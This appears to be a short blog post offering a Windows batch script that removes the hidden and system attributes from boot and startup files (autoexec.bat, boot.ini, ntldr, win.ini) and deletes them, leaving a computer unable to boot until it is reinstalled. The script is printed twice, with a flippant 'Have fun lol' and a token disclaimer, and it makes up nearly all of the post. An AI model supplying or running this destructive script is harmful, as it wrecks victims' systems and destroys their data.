Introduction
The code
its a batch file that wipes that start-up files of a computer, so don’t be a noob ad test it out on your own computer coz it'll screw your computer up and the only way to fix it is to re-image your computer fully (wipe the hard drive and re-install windows again LOL)
The code
its a batch file that wipes that start-up files of a computer, so don’t be a noob ad test it out on your own computer coz it'll screw your computer up and the only way to fix it is to re-image your computer fully (wipe the hard drive and re-install windows again LOL)
Code:
-----Disclaimer - Not to be used to damage/harm other people’s computer systems----------
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
D
Have fun lol
DCode:-----Disclaimer - Not to be used to damage/harm other people’s computer systems---------- @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini
Have fun lol
No comments:
Post a Comment